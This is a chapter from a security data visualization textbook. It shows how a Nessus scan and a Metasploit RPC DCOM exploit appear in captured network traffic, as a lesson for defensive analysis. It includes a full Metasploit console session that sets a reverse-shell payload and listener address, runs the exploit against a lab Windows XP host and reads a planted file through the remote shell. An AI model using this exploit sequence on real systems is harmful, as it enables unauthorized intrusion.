Vulnerability Assessment

4
a n d E x p l o i t a t i o n

Attackers use vulnerability assessment tools to rap-

idly find weaknesses in networked computers. These
weaknesses are known vulnerabilities, flaws that secu-
rity researchers have already discovered that allow
Copyright © 2007. No Starch Press, Incorporated. All rights reserved.

an attacker to violate a computer’s security mechanisms. Vulnerabilities

can take many forms, such as buffer overflows or input validation errors,
but they always result in unintended behavior that subverts the security
of the targeted system, usually by executing malicious code on the target
machine. Despite the fact that these vulnerabilities are common knowledge
in the security community, users often delay patching their systems because
of ignorance, apathy, or lack of resources, leaving their systems open to
attack. Rather than manually attempting to identify and exploit vulnerable
computers, attackers can employ tools such as Nessus ([Link]
.org) and Metasploit ([Link] which automate the
attack process and utilize entire libraries of vulnerabilities that are updated
regularly as new ones are discovered. Because of these strengths, both legiti-
mate security professionals as well as attackers use these tools to probe and
attack networks. Vulnerability assessment tools often combine network

Conti, G. (2007). Security data visualization : Graphical techniques for network analysis. No Starch Press, Incorporated.
Created from inflibnet-ebooks on 2024-01-05 [Link].
 reconnaissance, usually port scans, with targeted attempts to identify
and test vulnerabilities. Nessus, developed by Tenable Network Security
([Link] is an extremely popular as well as
powerful vulnerability assessment tool, which I’ll use in this chapter to
demonstrate how vulnerability assessment works and how we can use visu-
alization to analyze various network attacks. I’ll follow up this discussion
with a walk-through of Metasploit, an open source platform for developing
and executing exploit code. I’ll then use visualization to closely examine the
behavior of a Metasploit attack that follows a common pattern: exploitation
of a known vulnerability, transfer of a malicious payload, and subsequent
compromise of the targeted host.

Nessus
Nessus began as a freely distributed, open source project. It uses a client-
server architecture, meaning that there are two components: a client that
controls the vulnerability assessment and a server that conducts it. Nessus
uses a library of plug-ins, small programs designed to test a given vulner-
ability to evaluate the target system. Figure 4-1 shows this plug-in library
displayed with NessusWX ([Link] a Nessus client for
Windows created by Victor Kirhenshtein and Nicolas Pouvesle.
Copyright © 2007. No Starch Press, Incorporated. All rights reserved.

Figure 4-1: A list of Nessus plug-ins displayed with the NessusWX client


In addition to Nessus, there are a number of other well-regarded vulnerability assessment
tools, including eEye’s Retina and Core Security Technologies’ CORE IMPACT. See http://
[Link]/[Link] for more information on these and similar tools.

Version 2.x remains free, but versions 3.x and later are commercial products. I’ll be using
version 2.x for my analysis.

You can find a comprehensive list of Nessus plug-ins at [Link]

60 Chapter 4

Conti, G. (2007). Security data visualization : Graphical techniques for network analysis. No Starch Press, Incorporated.
Created from inflibnet-ebooks on 2024-01-05 [Link].
 A typical vulnerability assessment occurs in two phases. In the first
stage, a port scan probes for listening ports. In the second stage, Nessus
intelligently selects from its list of plug-ins based on the target machine.
For example, Nessus won’t test a Unix machine for Windows-specific vul-
nerabilities. As the vulnerability assessment takes place, Nessus provides a
continuous update on the vulnerabilities it finds, including a count of holes
(exploitable vulnerabilities) and active ports (Figure 4-2). At the end of the
scan, Nessus provides a detailed report listing the specific vulnerabilities it
found as well as details on how those vulnerabilities can be secured.
As I begin an attack using Nessus, let’s capture some packets and
observe the probe from the target’s perspective. By gaining a better under-
standing of what attacks look like, we can apply that knowledge in later
chapters as we examine real-world network traffic.

Figure 4-2: During the Nessus vulnerability assessment, the attacker

receives continuous updates on the target’s vulnerabilities.

Dissecting a Nessus Vulnerability Assessment

In both real-world attacks and this simulated attack, the defender must
depend on the data he or she can collect. In the following example, I
conducted a Nessus scan on a partially patched Windows XP host, which
collected packets of the entire scan using Wireshark. I’ll use these packets
to dissect how Nessus operates as well as gain insight into specific attack
Copyright © 2007. No Starch Press, Incorporated. All rights reserved.

techniques.
Highly interactive visualization systems are very useful to analysts
because they allow dynamic exploration, not just static views of data. Fig-
ure 4-3 shows the interface of one interactive system, RUMINT ([Link]
.[Link]). (You saw RUMINT’s parallel coordinate plot visualizations in
Chapter 3.) RUMINT uses a VCR-like interface to enable analysts to visually
play back traffic from any point within the set of packets. The user simply
loads the packet capture, opens the appropriate visualization windows, and
clicks the Play button.


RUMINT is intelligence community slang for rumor intelligence.

Some network tools literally play back packets by resending them on a network. While
RUMINT might provide this ability at some point in the future, here I am talking about
plotting packet data in visualization windows.

Vulnerability Assessment and Exploitation 61

Conti, G. (2007). Security data visualization : Graphical techniques for network analysis. No Starch Press, Incorporated.
Created from inflibnet-ebooks on 2024-01-05 [Link].
 When I examine an unfamiliar dataset for the first time, I play it back
in its entirety to get a feel for the big-picture context. In other words, I load
the new dataset into RUMINT, open a visualization window or two (such
as the parallel coordinate plot) using the View menu, and then click the
Play button, which causes RUMINT to update each of the visualization dis-
plays based on the packet data. All we know about Nessus initially is that it
conducts a port scan and then attempts to find vulnerabilities in the ports
that are open. As I analyze the dataset, my strategy will be to precisely iso-
late the port scan and then remove it from the visualizations so I can focus
on the vulnerability phase of the attack. The dataset I captured from the
Nessus scan contains 36,156 packets. As we did in Chapter 3, let’s focus on
the 18,708 inbound packets. While the host’s responses also contain poten-
tially useful information, I’m more concerned with learning about how
Nessus conducts its probing.

Figure 4-3: Using RUMINT’s VCR-like interface to interact with our

visualizations

Using a Packet Length Visualization

Port scans generate a large number of small, similar packets. These small
packets typically have no payload and are capable of providing fast scans.
Let’s use this fact to visualize the dataset in an efficient way, one that should
still help us distinguish between the first phase of the attack (the port scan)
and the second (the exploit attempts). Figure 4-4 shows my approach. Simi-
lar to a horizontal bar graph, this visualization plots packet lengths, one
packet per horizontal row. Since we are looking at data transmitted across
Copyright © 2007. No Starch Press, Incorporated. All rights reserved.

an Ethernet network, we know that 1,518 bytes is the largest permissible

size for an individual packet, so we’ll use this as the maximum value of the
horizontal (packet length) axis. Let’s use the VCR interface to play back the
traffic and display it using the packet length visualization.

NOTE While 1,518 bytes is the maximum size allowed by the original Ethernet specification,
newer specifications allow “jumbo frames” of 9,000 bytes. However, it is unlikely that
you will see jumbo frames on typical home and business networks.

62 Chapter 4

Conti, G. (2007). Security data visualization : Graphical techniques for network analysis. No Starch Press, Incorporated.
Created from inflibnet-ebooks on 2024-01-05 [Link].
 1
Packet number
n

0 1518

Packet length (bytes)

Figure 4-4: Packet length visualization. It displays each packet as a

horizontal bar with a length that is proportional to the given packet’s
length. I’ve colored each bar based on the protocol of the packet.

Finding and Removing the Port Scan

When I play back the entire dataset into the packet length visualization, it
appears that Nessus conducted the port scan using the first 15,467 packets.
I make this determination based on the solid green bar which represents
very small TCP packets shown in Figure 4-5. At packet 15,468, the visualiza-
tion abruptly changes to a mixture of varied protocols and lengths. You can
see the change in the main image, as well as in the detail regions.
Copyright © 2007. No Starch Press, Incorporated. All rights reserved.

0 1000
Packet length
(bytes)

Port scan phase Attack phase

Figure 4-5: Using the packet length visualization to find the port scan within the Nessus vulnerability assess-
ment. This image shows the transition from the initial port scan, the solid green bar at the top of the screen,
to the port-specific attack phase.

Vulnerability Assessment and Exploitation 63

Conti, G. (2007). Security data visualization : Graphical techniques for network analysis. No Starch Press, Incorporated.
Created from inflibnet-ebooks on 2024-01-05 [Link].
 Removing the port scan from the visualization is in my best interest
because it generates a lot of noise and consumes valuable screen space, CPU
time, and memory. However, while I’m reasonably sure that I’ve correctly
identified the scan, let’s use another visualization technique to verify that.
Figure 4-6 shows a parallel coordinate plot of the packets from the begin-
ning of the dataset to the transition point we noted at packet 15,468. This
graph shows that a single attacker probed a wide range of ports on the tar-
get machine. As you examine the image, note that Nessus used a continuous
series of source TCP ports. Clues such as port allocation give us insight into
the operating system of the attacker—which, in this case, is Slackware Linux
([Link] well as insight into the network program-
ming techniques employed by the attack tool’s developers. Note how Nessus
compares to our earlier visualizations of port scan software in Figure 3-9.
Now that we’ve safely identified the port scan, let’s continue our analysis.
Copyright © 2007. No Starch Press, Incorporated. All rights reserved.

Source TCP TCP Destination

IP address source destination IP address
port port

Figure 4-6: Using a parallel coordinate plot to confirm the port scan. Notice the
sequential probing of destination ports.

64 Chapter 4

Conti, G. (2007). Security data visualization : Graphical techniques for network analysis. No Starch Press, Incorporated.
Created from inflibnet-ebooks on 2024-01-05 [Link].
 Animating Packets
Let’s examine an animated display for the Nessus dataset. Figure 4-7 com-
bines the static nature of the parallel coordinate plot with packet animation.

TCP source port TCP destination port

65535 65535

0 0

n 1 1 n
Packet Packet

TCP source port TCP destination port

65535 65535
Copyright © 2007. No Starch Press, Incorporated. All rights reserved.

0 0

n 1 1 n
Packet Packet

Figure 4-7: Animating the playback of the packets. The center section is a two-column
parallel coordinate plot, and the side sections use animated markers for packets. The top
image depicts the visualization after the arrival of five packets. The bottom image shows
how the display is updated after the arrival of three new packets.

Vulnerability Assessment and Exploitation 65

Conti, G. (2007). Security data visualization : Graphical techniques for network analysis. No Starch Press, Incorporated.
Created from inflibnet-ebooks on 2024-01-05 [Link].
 This is important because parallel plots suffer from a significant shortcom-
ing: If packet header fields all have similar data, the resulting plots will be
identical. One thousand packets could follow the same path and you would
never know. The combined visualization, developed by Sven Krasser and
shown in Figure 4-7, solves this problem. The center region is a typical two-
column parallel coordinate plot. While we could plot any type of data from
the packet header fields on these axes, I’ve used TCP source and destination
ports. You may wish to explore different combinations; RUMINT supports
19 header fields.
As each packet arrives, RUMINT plots the line segment as with a nor-
mal parallel coordinate plot, but the tool also creates markers on each of
the side panes, one pair per packet (Figure 4-7, top). These markers start
out at the end of the newly plotted parallel coordinate plot line segment.
As additional packets arrive, existing markers are shifted slightly outward
toward the edge of the visualization (Figure 4-7, bottom). When the mark-
ers eventually reach the end of the display, they disappear. The result of
looping through this process is an animated display that allows you to see
how the two axis values change with each packet. In other words, we can
now compare the behavior of each packet against the others. For example,
increased activity on a particular port will result in an increased number of
markers issuing forth from a constant point on the respective axis. Note the
use of color for the markers. By assigning color based on a third variable, we
increase the amount of information shown in the display. Now, let’s use the
combined visualization technique to look at the Nessus dataset.

Exploring the Remaining Activity

When analyzing datasets, the trick is to identify the “interesting” aspects
for further inspection. Take a look at Figure 4-8. What stands out? You
should see a large diagonal green band in the middle of the display and
fainter diagonal lines on both the left and right sides. The green band and
the two diagonal lines are the port scan we just identified. In the figure,
I zoomed in on an additional region that I found interesting. (The area
Copyright © 2007. No Starch Press, Incorporated. All rights reserved.

inside the red square in the main image is shown in greater detail below.)
Beyond the regularly spaced port scan traffic, Nessus generated a great deal
of activity targeting the lower ports. To focus on this, I filtered out all the
traffic with a destination port greater than 500, zoomed in, and then ran the
visualization once more. My decision to use 500 was somewhat arbitrary; you
might also choose to filter out ports greater than 1024, which would allow
you to focus on the privileged ports from 0 to 1023. However, I noticed that


See Sven Krasser, Greg Conti, Julian Grizzard, Jeff Gribschaw, and Henry Owen’s “Real-Time
and Forensic Network Data Analysis Using Animated and Coordinated Visualization” from the
2005 IEEE Information Assurance Workshop for more details on this technique.

66 Chapter 4

Conti, G. (2007). Security data visualization : Graphical techniques for network analysis. No Starch Press, Incorporated.
Created from inflibnet-ebooks on 2024-01-05 [Link].
 65535 65535

0 0
TCP TCP
source port destination port

Figure 4-8: Using the combined visualization technique to view the entire dataset. Notice the cluster of activity
targeting the low ports.

there was a great deal of activity on ports below 500, however, and filtering
Copyright © 2007. No Starch Press, Incorporated. All rights reserved.

in this way provides about twice as much detail as filtering below 1024. Upon
closer inspection, the image didn’t reveal any additional packets with values
less than 100, so I ran the visualization again to filter out any packets with
TCP destination ports less than 100 and greater than 500. I did this to maxi-
mize the detail displayed in the available screen space. Figure 4-9 shows the
result.

Vulnerability Assessment and Exploitation 67

Conti, G. (2007). Security data visualization : Graphical techniques for network analysis. No Starch Press, Incorporated.
Created from inflibnet-ebooks on 2024-01-05 [Link].
 65535 500

0 100

TCP TCP
source port destination port
Copyright © 2007. No Starch Press, Incorporated. All rights reserved.

Figure 4-9: Filtering out everything except ports 100 to 500. By filtering and zooming in, we see two clusters
of Nessus activity, but the display is clouded by the port scan.

Identifying the Specific Ports

Filtering and zooming in shows us that Nessus seemed to target several low
ports (Figure 4-9), but the display is heavily occluded by the port scan. By
first identifying the scan (Figure 4-10) and then removing it from the

68 Chapter 4

Conti, G. (2007). Security data visualization : Graphical techniques for network analysis. No Starch Press, Incorporated.
Created from inflibnet-ebooks on 2024-01-05 [Link].
 65535 500

0 100

TCP TCP
source port destination port

Figure 4-10: Isolating the port scan. Notice the diagonal line on the right pane that shows
a series of destination ports being probed in succession.

display (Figure 4-11), we can easily determine the specific ports that were
targeted: 445, 139, and 135. What makes these ports significant? Ports 445
and 139 are associated with Windows file sharing, and port 135 is used for
locating Windows Distributed Component Object Model (DCOM) services.
Copyright © 2007. No Starch Press, Incorporated. All rights reserved.

DCOM services are software components that communicate across a network,

and each has a litany of well-known vulnerabilities. Nessus has plug-ins for
these vulnerabilities and tests the target computer for each of them. In
this case the target computer had a number of serious vulnerabilities (Fig-
ure 4‑12). Notice the high number of reported vulnerabilities on TCP ports
445, 139, and 135—this matches our observation of heavy activity on those
same ports.

Vulnerability Assessment and Exploitation 69

Conti, G. (2007). Security data visualization : Graphical techniques for network analysis. No Starch Press, Incorporated.
Created from inflibnet-ebooks on 2024-01-05 [Link].
 65535 500

0 100

TCP TCP
source port destination port

Figure 4-11: Removing the port scan from the display. Notice that Nessus focused a great
deal of attention on ports 445, 139, and 135.
Copyright © 2007. No Starch Press, Incorporated. All rights reserved.

Let’s take a closer look at port 445. Figure 4-13 uses a simple technique
that I call a text rainfall set to display only printable ASCII strings of 5 char-
acters or more. The text rainfall displays contents of the packet as text, one
packet per line. If a byte is a printable ASCII character, it is printed directly;
in the case of byte values that don’t have an easily printable ASCII value, the
text rainfall prints a period character. The text rainfall allows an analyst to
compare the payloads of 25 to 50 packets at one time, and it is extremely
useful for cases in which the communication protocol uses unencrypted
human-readable commands, which are common. Notice that in these
packets, Nessus has identified the target machine’s name (CRAYII) and is
currently evaluating ADMINISTRATOR access. One drawback is that a text rain-
fall can only show about 80 to 120 characters per packet at one time on a

70 Chapter 4

Conti, G. (2007). Security data visualization : Graphical techniques for network analysis. No Starch Press, Incorporated.
Created from inflibnet-ebooks on 2024-01-05 [Link].
 Figure 4-12: Vulnerabilities reported by Nessus. Notice the large number of
vulnerabilities reported on TCP ports 135, 139, and 445.
Copyright © 2007. No Starch Press, Incorporated. All rights reserved.

Figure 4-13: A text rainfall visualization of the Nessus vulnerability assessment.

Notice that the rainfall helps you see the attacks in action.

typical monitor; the rest is either truncated, or the user must scroll hori-
zontally to see it. In most instances this isn’t a major disadvantage, because
many human-readable protocol commands typically occur right after packet


Of course, you always have the option of getting a bigger monitor.

Vulnerability Assessment and Exploitation 71

Conti, G. (2007). Security data visualization : Graphical techniques for network analysis. No Starch Press, Incorporated.
Created from inflibnet-ebooks on 2024-01-05 [Link].
 headers and are easily visible in the first 80 to 120 characters. I’ll end my
analysis here, but an interesting extension would be to generate a catalog of
the visual signatures created by each plug-in. With these signatures, I believe
you could rapidly detect each type of exploitation attempt, and perhaps
even determine its success or failure, in other similar attacks.
We’ve just seen how Nessus performs vulnerability assessments, but
Nessus stops short of actually delivering a malicious payload, a key com-
ponent of real-world attacks. The next section covers Metasploit, which is
designed to do just that.

Metasploit
Metasploit is an advanced open source platform for developing, testing, and
using exploit code ([Link] It gives both seasoned
attackers and novices the ability to easily execute sophisticated exploits. An
attacker first chooses from a library of exploits, code that takes advantage of a
known vulnerability to bypass security. Second, the attacker pairs the chosen
exploit with a payload, the code that is executed after a successful attack. As
of this writing, Metasploit includes 143 different exploits and 75 different
payloads. Developed by the Metasploit Project and first released in 2003,
Metasploit is a significant advancement in hacking. Previously, exploits were
hard coded with individual payloads, and this inflexibility greatly reduced an
attacker’s ability to adapt and propagate attacks. Using Metasploit, however,
attackers can mix, match, and share attacks far more easily.
Nessus directly integrates port scanning into its probing, but Metasploit
assumes you have already identified ports of interest. Unless a machine is
up to date on security patches or protected behind a well-tuned firewall,
chances are an attacker can use Metasploit to successfully gain unauthorized
access. In this section, we’ll look at ways to visualize Metasploit attacks both
before and after compromise to help understand how they work. In this
example, assume that I’ve already used Nmap to probe a target computer
and have found a Microsoft Remote Procedure Call (RPC) DCOM service
running on port 135. This assumption does not require a leap of faith, as
Copyright © 2007. No Starch Press, Incorporated. All rights reserved.

this service is commonly used by Windows operating systems. Unfortunately,

attackers discovered that by sending specially crafted input to this port (the
exploit), they could execute code of their choosing (the payload) on the
target machine. I chose this vulnerability as an example because it is well
known and illustrates the key aspects of an attack. Security experts discover
new network service vulnerabilities every day, but these attacks all tend to
follow the same basic pattern: exploitation of a vulnerability to seize privi-
leged access on a target machine, delivery and execution of a payload, and
some sort of follow-up unauthorized activity. My example using the RPC
DCOM vulnerability will cover all three facets.


Metasploit is powerful and can quickly get you into a lot of trouble. Make sure you are fully
authorized before using it on any network.

You can find a detailed Microsoft Security Bulletin on this vulnerability at [Link]
.[Link]/technet/security/bulletin/[Link].

72 Chapter 4

Conti, G. (2007). Security data visualization : Graphical techniques for network analysis. No Starch Press, Incorporated.
Created from inflibnet-ebooks on 2024-01-05 [Link].
 Choosing an Exploit
An attacker begins by using Metasploit’s show exploits command to search
for an appropriate exploit. The following is a partial listing of available
exploits.

msf > show exploits

Metasploit Framework Loaded Exploits
====================================
...
msasn1_ms04_007_killbill Microsoft ASN.1 Library Bitstring Heap Overflow
msmq_deleteobject_ms05_017 Microsoft Message Queueing Service MSO5-017
msrpc_dcom_ms03_026 Microsoft RPC DCOM MSO3-026
mssql2000_preauthentication MSSQL 2000/MSDE Hello Buffer Overflow
mssql2000_resolution MSSQL 2000/MSDE Resolution Overflow
netterm_netftpd_user_overflow NetTerm NetFTPD USER Buffer Overflow
novell_messenger_acceptlang Novell Messenger Server 2.0 Accept-Language Overflow
openview_connectednodes_exec HP Openview [Link] Remote Command Execution
openview_omniback HP OpenView Omniback II Command Execution
oracle9i_xdb_ftp Oracle 9i XDB FTP UNLOCK Overflow (win32)
...

With the knowledge that Metasploit’s msrpc_dcom_ms03_026

exploit (shown in bold above) will likely be effective against the
port 135 RPC DCOM service identified by Nmap, the attacker uses the
use msrpc_dcom_ms03_026 command to exploit the vulnerability. Because
each exploit requires additional information before it can run, the
attacker then uses the show options command to check its requirements.

msf > use msrpc_dcom_ms03_026

msf msrpc_dcom_ms03_026 > show options

Exploit Options
===============

Exploit: Name Default Description

Copyright © 2007. No Starch Press, Incorporated. All rights reserved.

-------- ------ ------- ------------------

required RHOST The target address
required RPORT 135 The target port

Target: Windows NT SP3-6a/2K/XP/2K3 English ALL

For the uninitiated, these results from the show options command may
appear a bit cryptic. They show us that the exploit requires the IP address
of the target host (RHOST) and the port of the RPC service (RPORT). Note that
RPORT is already set to 135 by default, so all we need to do is use the set com-
mand to set the target’s IP address (which we identified as [Link]
during our initial Nmap scan).

msf msrpc_dcom_ms03_026 > set RHOST [Link]

RHOST -> [Link]

Vulnerability Assessment and Exploitation 73

Conti, G. (2007). Security data visualization : Graphical techniques for network analysis. No Starch Press, Incorporated.
Created from inflibnet-ebooks on 2024-01-05 [Link].
 Choosing a Payload
The next step is to select the payload we would like to pair with the exploit,
using the show payloads command.

msf msrpc_dcom_ms03_026 > show payloads

Metasploit Framework Usable Payloads

====================================
...
win32_exec Windows Execute Command
win32_passivex Windows PassiveX ActiveX Injection Payload
win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload
win32_passivex_stg Windows Staged PassiveX Shell
win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_ord Windows Staged Reverse Ordinal Shell
win32_reverse_ord_vncinject Windows Reverse Ordinal VNC Server Inject
...

Notice that because I chose a Windows exploit, Metasploit lists only

Windows-compatible payloads. After successful exploitation, these payloads
allow an attacker to do things like upload and execute malicious programs
on the target computer, run a Virtual Network Computing (VNC) server
to remotely control the target’s desktop, add unauthorized users, or gain a
shell (i.e., command-line access) on the target machine. I’d like the ability
to interact with the target using the command line, so I used the set PAYLOAD
command to choose the Windows Reverse Shell (shown in bold above).
Then I’ll use the show options command to determine whether the payload
requires any additional information.

msf msrpc_dcom_ms03_026 > set PAYLOAD win32_reverse

PAYLOAD -> win32_reverse
Copyright © 2007. No Starch Press, Incorporated. All rights reserved.

msf msrpc_dcom_ms03_026(win32_reverse) > show options

Exploit and Payload Options

===========================

Exploit: Name Default Description

-------- ------ ------------- ------------------
required RHOST [Link] The target address
required RPORT 135 The target port

Payload: Name Default Description

-------- -------- ------- ------------------------------------------
required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection

Target: Windows NT SP3-6a/2K/XP/2K3 English ALL

74 Chapter 4

Conti, G. (2007). Security data visualization : Graphical techniques for network analysis. No Starch Press, Incorporated.
Created from inflibnet-ebooks on 2024-01-05 [Link].
 The payload requires that I choose which local host address should
receive the reverse shell connection (LHOST). I set this value to the IP
address of the attacking machine ([Link]) using the set LHOST com-
mand. I won’t alter the default local port that will receive the connection
(LPORT), which is 4321. The commonplace use of default values brings up an
important point: Many attackers will not deviate from these defaults. When
attackers rely on default values, they make their attacks easier to detect and
respond to.

Executing the Attack

Now that I’ve configured everything correctly, I’ll execute the attack using
the exploit command.

msf msrpc_dcom_ms03_026(win32_reverse) > set LHOST [Link]

LHOST -> [Link]
msf msrpc_dcom_ms03_026(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Sending request...
[*] Got connection from [Link]:4321 <-> [Link]:1063

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Success! I now have command-line access on the target computer.

Earlier, as I was creating this scenario, I placed a secret file ([Link]) on
the target computer in a directory called topsecret. Let’s see if I can use my
newfound access to view this file. I use the cd \topsecret command to tell the
target computer to change to the topsecret directory, and then I use the dir
command to tell it to list the directory’s contents. Finally, I use the type com-
mand to view the contents of the only file in the directory. It turns out that
[Link] contains the United States Bill of Rights, a portion of which appears
below. After displaying the contents of the file, the reverse shell returns the
Copyright © 2007. No Starch Press, Incorporated. All rights reserved.

attacker to the command line. At this point, the attacker maintains complete
access to the target machine and can proceed as desired.

C:\WINDOWS\system32>cd \topsecret

C:\topsecret>dir

Volume in drive C has no label.

Volume Serial Number is 42F9-BC37

Directory of C:\topsecret

04/05/2002 01:28 PM <DIR> .

04/05/2002 01:28 PM <DIR> ..
09/28/2006 11:27 PM 3,725 [Link]

Vulnerability Assessment and Exploitation 75

Conti, G. (2007). Security data visualization : Graphical techniques for network analysis. No Starch Press, Incorporated.
Created from inflibnet-ebooks on 2024-01-05 [Link].
 1 File(s) 3,725 bytes
2 Dir(s) 4,104,339,456 bytes free

C:\topsecret>type [Link]

THE BILL OF RIGHTS

Amendments 1-10 of the Constitution

The Conventions of a number of the States having, at the time of adopting the Co
nstitution, expressed a desire, in order to prevent misconstruction or abuse of
its powers, that further declaratory and restrictive clauses should be added, an
d as extending the ground of public confidence in the Government will best insur
e the beneficent ends of its institution;

<snip>

The right of the people to be secure in their persons, houses, papers, and effec
ts, against unreasonable searches and seizures, shall not be violated, and no wa
rrants shall issue, but upon probable cause, supported by oath or affirmation, a
nd particularly describing the place to be searched, and the persons or things t
o be seized.

<snip>

Determining the Source and Destination Sockets

Because the attack occurred over a network, the exploit, payload, and sub-
sequent reverse shell communications all exist in the underlying network
packets. From the beginning of the attack to the successful listing of the
secret file, this attack used 50 packets. Let’s examine these packets to see
how the attack took place. As we examine the data, we should see two dis-
tinct phases: the initial exploitation of port 135 and the subsequent reverse
shell activity. To help us tease apart the attack, recall that I targeted the ser-
vice running on port 135 of the target machine, [Link].

NOTE The combination of an IP address and transport layer port is called a socket, and it
Copyright © 2007. No Starch Press, Incorporated. All rights reserved.

uniquely identifies a communicating process anywhere on the Internet.10 Sockets are

often abbreviated in IPAddress:Port format, such as [Link]:135.
I also configured the reverse shell payload to communicate back to
port 4321 on my attack machine, [Link]:4321. We don’t know the
source port number the attacking machine’s operating system chose for
the Metasploit attack, nor do we know the port number of the reverse shell
process on the target machine. We’d like to know these values so we can
fully understand the nature of Metasploit’s behavior. Figure 4-14 uses the
now familiar parallel coordinate plot of source IP address, source TCP

10
In certain instances, IP addresses are hidden behind a firewall and may not be unique across
the entire Internet.

76 Chapter 4

Conti, G. (2007). Security data visualization : Graphical techniques for network analysis. No Starch Press, Incorporated.
Created from inflibnet-ebooks on 2024-01-05 [Link].
 port, destination TCP address, and destination IP address to fill in these
two missing pieces of information. Note that the initial Metasploit attack
against port 135 was launched from port 1267, and the reverse shell back to
port 4321 came from port 1063. To summarize, the following two pairings
identify the processes in use.
Initial exploitation phase

(Attacker) [Link]:1267 <-----> (Target) [Link]:135

Reverse shell activity

(Attacker) [Link]:4321 <-----> (Target) [Link]:1063

Reverse
shell

Exploit
Copyright © 2007. No Starch Press, Incorporated. All rights reserved.

Source TCP
TCP Destination
IP address source
destination IP address
port
port

Figure 4-14: By using the parallel coordinate plot to confirm the initial attack against
port 135, we can see that it came from port 1267. In addition, we can see that the
reverse shell activity occurred on my chosen port, 4321, and the port chosen by the
target’s operating system, 1063.

Vulnerability Assessment and Exploitation 77

Conti, G. (2007). Security data visualization : Graphical techniques for network analysis. No Starch Press, Incorporated.
Created from inflibnet-ebooks on 2024-01-05 [Link].
 Analyzing the Initial Exploitation and Follow-up Activity
In order to continue our exploration of the attack, let’s use two additional
visualization techniques to observe what occurred. A packet length display
(Figure 4-15) shows two distinct clusters of large packets. Based on our
knowledge of the attack, we can deduce that the top cluster of large packets
is probably the exploit and that the bottom cluster is probably the reverse
shell. Unfortunately, a simple bar graph of packet lengths doesn’t allow us
to confirm our instincts.
1
Packets
50

0 1518
Packet length (bytes)

Figure 4-15: Comparing packet lengths. Note the two clusters of larger packets at the top
and bottom of the display. The first likely contains the initial attack, and the second likely
depicts the subsequent shell activity. The next figure explores this hypothesis further.

Figure 4-16 shows the same packets using a technique I developed

called the binary rainfall.11 Similar to the packet length visualization, the
binary rainfall shows one packet per line and depicts packet length. I’ll go
into more detail in Chapter 6, but for now, just understand that the binary
rainfall also color-codes pixels based on the bytes within the packets, letting
Copyright © 2007. No Starch Press, Incorporated. All rights reserved.

us quickly view the actual contents of many packets without resorting to

viewing them as text. In Figure 4-16, I used blue to depict bytes containing
printable ASCII characters and gray to represent all other bytes; the more
intense the blue, the greater the density of printable characters. Notice
that the bottom cluster of large packets glows bright blue because of the
command-line activity and the display of the secret file. The top cluster has
few printable ASCII characters and is indicative of the exploit and reverse
shell payload. In the future, I believe it will be possible to use knowledge
of the statistical makeup of executable files to help identify code within
packets, similar to what I did here with printable characters.

11
For more information, see Gregory J. Conti, Julian B. Grizzard, Mustaque Ahamad, and
Henry L. Owen’s “Visual Exploration of Malicious Network Objects Using Semantic Zoom,
Interactive Encoding and Dynamic Queries” from VizSEC 2005.

78 Chapter 4

Conti, G. (2007). Security data visualization : Graphical techniques for network analysis. No Starch Press, Incorporated.
Created from inflibnet-ebooks on 2024-01-05 [Link].
 1
Packets
50

Packet length (bytes)

Figure 4-16: Using color to highlight printable ASCII bytes in the network packets so
that the reverse shell activity in the lower region stands out. The top region contains
few printable ASCII bytes and is likely the initial exploit.

Stepping Through the Attack

Now that we know the ports in use and the general clusters of activity,
let’s combine this knowledge with several visualization techniques to step
through the attack. To help the analysis, I’ve divided the packets into two
datasets—those sent by the attacker and those sent by the target—because
I want to analyze the activities of each one individually. I’ve found that
separating the inbound and outbound traffic in this way greatly reduces
the clutter in the visualization displays. I don’t propose this approach as a
general-purpose solution, but you may find it a useful analytic technique.
The combined visualization in the upper-right corner of Figure 4‑17
shows the first dataset, the attacker’s communication with the target
machine. The attack begins with the attacker sending a number of pack-
ets to the vulnerable service listening on port 135. Of these, the most
Copyright © 2007. No Starch Press, Incorporated. All rights reserved.

interesting are the large packets (4, 5, and 7) of non-printable ASCII

characters. These are the same packets I pointed out in the binary rainfall
display, and they are visible at the bottom of Figure 4-17. As I mentioned
earlier, visual analysis of malicious payloads, also known as shellcode, is an
open research area. I’ve simply resorted to using a text display to view the
hexadecimal packet payloads. Moving on to the reverse shell listening on
port 1063 (Figure 4-17, upper left), an examination of the packets sent to
this port clearly shows the commands I issued to the target computer while
using Metasploit: cd \topsecret (packet 13), dir (packet 16), and type [Link]
(packet 19).

NOTE Visualization of shellcode is an area ripe for additional work. If you are interested in
exploring this further, Hack Proofing Your Network by Ryan Russell (Syngress,
2002) and Hacker Disassembling Uncovered by Kris Kaspersky (A-List, 2007)
are both good starting points.

Vulnerability Assessment and Exploitation 79

Conti, G. (2007). Security data visualization : Graphical techniques for network analysis. No Starch Press, Incorporated.
Created from inflibnet-ebooks on 2024-01-05 [Link].
 Copyright © 2007. No Starch Press, Incorporated. All rights reserved.

80
Chapter 4

Created from inflibnet-ebooks on 2024-01-05 [Link].

Outbound reverse shell commands (port 1063)

Source Destination
IP address port

Exploit and
payload packets

Conti, G. (2007). Security data visualization : Graphical techniques for network analysis. No Starch Press, Incorporated.
(port 135)

Packet 4 Packet 5 Packet 7

Figure 4-17: Analyzing the attacker’s activities. The attacker initially sent a number of packets to exploit a vulnerability in port 135
(see packets 4, 5, and 7). After successfully installing the reverse shell software (listening on port 1063), the attacker sent it three
commands: cd, dir, and type.
 Figure 4-18 depicts the second dataset, which contains the traffic ema-
nating from the target host back to the attacker. Note that the bulk of the
traffic is destined for port 4321 on the attacker’s machine. Recall that I
chose this port for the reverse shell when I configured Metasploit for the
attack. The detail view shows the payloads of the packets, also using a text
rainfall. The responses to the commands I issued using Metasploit are
clearly visible in the payload, including the listing of the secret file.
Reverse shell communications to attacker (port 4321)
Copyright © 2007. No Starch Press, Incorporated. All rights reserved.

Source Destination
IP address port

Figure 4-18: Analyzing the targeted host’s activities. After compromise, the targeted host
responds to the attacker’s commands via the packets in the red box. The detail region
above shows that the payload of these packets contains the text of the secret file.

